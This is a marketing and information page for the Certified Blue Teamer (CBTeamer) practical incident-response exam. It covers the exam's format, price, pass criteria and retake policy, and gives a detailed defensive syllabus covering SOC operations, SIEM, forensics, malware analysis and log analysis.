Certified Blue Teamer
(CBTeamer)
The Certified Blue Teamer (CBTeamer) exam is an intermediate-level blue teaming and incident response exam designed to assess a candidate’s ability to investigate, correlate, and interpret a multi-stage intrusion within a modern Windows Active Directory enterprise. The exam simulates a realistic compromise against a mid-sized organization, where the attacker begins by exploiting public-facing infrastructure and gradually pivots deeper into the internal network.
Note: The exam details will be sent to you on/before 1st December, 2025.
- Practical
- 5 Hours
- Online
- On-demand
- Real world blue teaming scenarios
£250
Equivalent Industry Certifications*
*Note: We are not affiliated with any of the certifications mentioned here. These are respected industry certifications, and referenced here to show how our Certified Blue Teamer (CBTeamer) exam’s syllabus/difficulty overlaps with these exams.
If you already hold any of these, you’re likely well-prepared to test your knowledge with our exam. If you’re preparing for one, our exam is a great way to test your progress.
Who should take this exam?
The CBTeamer exam is designed for DFIR analysts, blue teamers, SOC professionals, detection engineers, and anyone seeking to demonstrate competence in real-world intrusion investigation. It is also highly suitable for pentesters and red teamers who want to understand how defenders analyze and investigate multi-stage attacks by examining network captures, Windows event logs, Sysmon telemetry, Active Directory artifacts, and memory forensics.
What is the format of the exam?
CBTeamer is an intense 5-hour practical exam that tests deep technical analysis skills. Candidates must investigate multi-stage attacks, correlate artifacts, and identify adversary activity across the intrusion lifecycle. The exam can be taken online, anytime (on-demand), and from anywhere. Candidates are given a dedicated analysis instance with a SIEM and all required logs, PCAPs, and memory images, and must connect to the exam VPN server to access the environment.
Note: While all our professional exams are 4 hour exams, with CBTeamer we have allowed an extra hour.
What is the pass criteria for the exam?
The pass criteria are as follows:
- Candidates scoring over 60% marks will be deemed to have successfully passed the exam.
- Candidates scoring over 75% marks will be deemed to have passed with merit.
What is the experience needed to take the exam?
This is an intermediate-level exam. Candidates should have solid, hands-on experience in Windows security monitoring, incident response, and enterprise intrusion analysis. They are expected to understand topics such as Active Directory telemetry, Kerberos authentication flows, network traffic interpretation, log correlation, and host-based forensic investigation. Candidates should be comfortable analyzing multi-stage attacks, identifying lateral movement, detecting credential abuse, and reconstructing adversary actions using logs, memory artifacts, and SIEM data.
Note: As this is an intermediate-level exam, a minimum of two years of professional blue teaming experience is recommended.
What will the candidates get?
On completing the exam, each candidate will receive:
- A certificate with their pass/fail and merit status.
- The certificate will contain a certificate number, which can be used for independent verification.
What is the exam retake policy?
Candidates who fail the exam are allowed 1 free exam retake as part of the exam fee.
What are the benefits of this exam?
This exam will allow candidates to demonstrate their capability in real-world intrusion investigation, including log analysis, correlation of multi-stage attacks, forensic triage, and reconstruction of adversary actions inside an enterprise environment. It provides strong credibility for roles in DFIR, SOC operations, and incident response, as well as for red teamers who want to understand how defenders trace and attribute attacker activity.
This exam helps professionals stand out in the cybersecurity field by validating their ability to analyze compromises using authentic evidence, interpret attacker tradecraft, and produce accurate investigative findings using industry-standard tools and processes.
How long is the certificate valid for?
The certificate does not have an expiration date. However, it will include the exam version and issue date. As the exam is periodically updated, candidates are encouraged to retake newer versions to stay current with modern blue team methodologies.
Will you provide any training that can be taken before the exam?
Being an independent certifying authority, we do not provide any training for the exam. Candidates should carefully go over each topic listed in the syllabus and make sure they have adequate understanding, required experience and practical knowledge of these topics. Further, the following independent resources can be utilised to prepare for the exams.
Learning Resources
Exam Syllabus
SECURITY OPERATIONS CENTER (SOC) FUNDAMENTALS
SOC Architecture & Operations
- Understanding SOC organizational structure with Tier 1, 2, 3 analyst roles and responsibilities
- SOC analyst workflows including threat models and key tools like SIEM and SOAR
- Shift operations, handover procedures, and effective case management using ticketing systems
Alert Management
- Triaging alerts to distinguish false positives from true threats requiring escalation
- Correlating multiple alerts across systems to identify coordinated attack patterns
- Documenting findings clearly for team collaboration and future reference
SECURITY INFORMATION & EVENT MANAGEMENT (SIEM)
SIEM Fundamentals
- Understanding how SIEM collects, centralizes, and analyzes log data from network devices, endpoints, and systems
- Configuring log sources and understanding data normalization for effective analysis
- Using common detection rules from community or vendor sources to enhance threat detection
Basic SIEM Queries
- Writing search queries in SPL (Splunk) or KQL (Microsoft Sentinel/Defender)
- Filtering and searching logs to investigate specific events or time periods
- Creating saved searches for recurring investigation needs
Detection Rule Creation
- Crafting high-quality detection rules to identify suspicious activities
- Baselining normal user and application behavior to spot deviations indicating potential threats
- Tuning rules to reduce false positives while maintaining security coverage
Dashboards & Visualization
- Creating operational dashboards to monitor real-time security events
- Building visualizations (charts, graphs, timelines) to communicate security metrics
- Configuring alerts and notifications for critical security events
MITRE ATT&CK FRAMEWORK
Framework Basics
- Understanding ATT&CK as a globally recognized knowledge base of adversary tactics and techniques based on real-world observations
- Navigating the ATT&CK Matrix to understand the 14 tactics and their associated techniques
- Using ATT&CK Navigator to visualize and track threat coverage
Practical Application
- Mapping detected security events to specific ATT&CK techniques during investigations
- Identifying which techniques your organization can detect vs. potential blind spots
- Using ATT&CK to communicate threats in a standardized language across teams
THREAT HUNTING FUNDAMENTALS
Hunting Methodologies
- Hypothesis-driven hunting where you formulate theories about potential threats and investigate them
- IOC-based hunting using known indicators of compromise from threat intelligence
- Understanding when to hunt proactively vs. reactively after an incident
Basic Hunting Techniques
- Baselining to understand normal behavior in your environment and identify anomalies
- Searching for suspicious processes, network connections, and user behaviors
- Using endpoint and network data to track potential attacker activity
Hunt Execution
- Starting with a clear hypothesis or question about potential threats
- Querying logs and security tools to test your hypothesis
- Documenting findings and creating new detections based on discoveries
INCIDENT RESPONSE BASICS
IR Process
- Following the incident response lifecycle: preparation, detection, containment, eradication, recovery, and lessons learned
- Determining incident severity and business impact for proper prioritization
- Communicating effectively with stakeholders during active incidents
Evidence Collection
- Preserving digital evidence while maintaining chain of custody for potential legal needs
- Collecting volatile data (memory, network connections) before non-volatile data (disk)
- Using forensic tools to create images without altering original evidence
Containment & Recovery
- Implementing short-term containment (isolate systems) and long-term fixes (patching vulnerabilities)
- Eradicating threats completely from the environment to prevent re-infection
- Documenting lessons learned to improve future incident response
DIGITAL FORENSICS ESSENTIALS
Windows Forensics
- Analyzing Windows Event Logs (Security, System, Application) for suspicious activity
- Investigating registry artifacts, prefetch files, and browser history for evidence
- Understanding Windows file system artifacts like MFT, USN Journal, and ShimCache
Linux Forensics
- Examining system logs in /var/log/ directory (auth.log, syslog, secure)
- Analyzing bash history and command-line artifacts to trace attacker actions
- Investigating authentication logs (wtmp, btmp) for unauthorized access
Memory Analysis Basics
- Understanding why memory forensics is critical for detecting fileless malware
- Using Volatility to analyze memory dumps for running processes and network connections
- Identifying malicious code injection and rootkits hiding in memory
Timeline Analysis
- Creating chronological timelines of events across multiple log sources
- Correlating file system, registry, and log timestamps to reconstruct attack sequences
- Using timelines to identify patient zero and full scope of compromise
PHISHING ANALYSIS
Email Header Analysis
- Analyzing email headers to verify sender authenticity and identify spoofing attempts
- Checking SPF, DKIM, and DMARC records to validate legitimate email sources
- Identifying discrepancies between displayed sender and actual originating server
Malicious Content Detection
- Safely analyzing suspicious URLs using sandboxes and defanging techniques
- Identifying malicious attachments through static analysis without executing them
- Recognizing social engineering tactics and business email compromise patterns
MALWARE ANALYSIS FUNDAMENTALS
Static Analysis Basics
- Examining malware files without executing them to identify capabilities and IOCs
- Using tools to check file hashes, extract readable strings, and identify packer usage
- Analyzing portable executable (PE) structure to understand imports and resources
Dynamic Analysis Basics
- Safely executing malware in sandboxes to observe runtime behavior
- Monitoring process creation, file modifications, and registry changes during execution
- Capturing network traffic generated by malware to identify command-and-control servers
IOC Extraction
- Documenting file hashes (MD5, SHA256) for threat intelligence and detection
- Identifying malicious IP addresses, domains, and URLs contacted by malware
- Extracting file paths, registry keys, and mutexes for creating detection signatures
NETWORK SECURITY MONITORING
Network Traffic Analysis
- Using Wireshark or tcpdump to capture and analyze network packets
- Understanding common protocols (HTTP, DNS, SMB) and identifying abnormal usage
- Detecting suspicious traffic patterns like data exfiltration or lateral movement
Intrusion Detection Systems
- Deploying and monitoring Snort or Suricata for network-based threat detection
- Understanding signature-based detection vs. anomaly-based detection approaches
- Analyzing IDS alerts, investigating triggered rules, and reducing false positives
Network Artifacts
- Analyzing DNS logs to detect tunneling, DGA domains, and command-and-control traffic
- Investigating proxy logs for malicious downloads and suspicious web access patterns
- Using NetFlow data to understand traffic patterns and detect anomalies
THREAT INTELLIGENCE BASICS
Intelligence Fundamentals
- Understanding tactical intelligence (IOCs) vs. strategic intelligence (threat actor trends)
- Following the intelligence lifecycle: collection, processing, analysis, dissemination
Open Source Intelligence (OSINT)
- Using public sources like VirusTotal, AlienVault OTX, and abuse.ch for threat data
- Investigating suspicious domains, IPs, and file hashes through OSINT platforms
- Monitoring security blogs, vendor reports, and Twitter for emerging threats
LOG ANALYSIS
Common Log Sources
- Understanding Windows Event Logs and key event IDs for security monitoring
- Analyzing authentication logs (successful/failed logins, account lockouts)
- Reviewing web server logs (Apache/IIS/nginx) for web application attacks
Log Correlation
- Correlating logs from different sources to identify broader attack patterns
- Linking failed login attempts with subsequent successful access for compromise detection
- Combining firewall, proxy, and endpoint logs to trace attacker lateral movement
Suspicious Pattern Detection
- Identifying failed authentication patterns indicating brute force or password spraying
- Detecting off-hours activity or access from unusual geographic locations
- Finding PowerShell obfuscation, encoded commands, and suspicious script execution
CLOUD SECURITY MONITORING
Cloud Logging
- Collecting and analyzing CloudTrail (AWS), Azure Monitor, or GCP Cloud Logging
- Understanding cloud-specific events like IAM changes, resource creation/deletion
- Monitoring for misconfigurations, publicly exposed resources, and privilege escalation
Cloud Threat Detection
- Detecting unusual API calls, unauthorized access attempts, and data exfiltration
- Identifying cryptomining activity through abnormal resource consumption
- Monitoring container and serverless environments for security issues
SECURITY DOCUMENTATION
Incident Reports
- Writing clear, concise incident reports with timeline, impact, and actions taken
- Including technical details, IOCs, and recommendations for future prevention
- Tailoring reports for technical teams vs. executive stakeholders
Playbook Creation
- Documenting step-by-step procedures for common incident types (phishing, malware, ransomware)
- Creating decision trees and response workflows for consistent handling
- Maintaining and updating playbooks based on lessons learned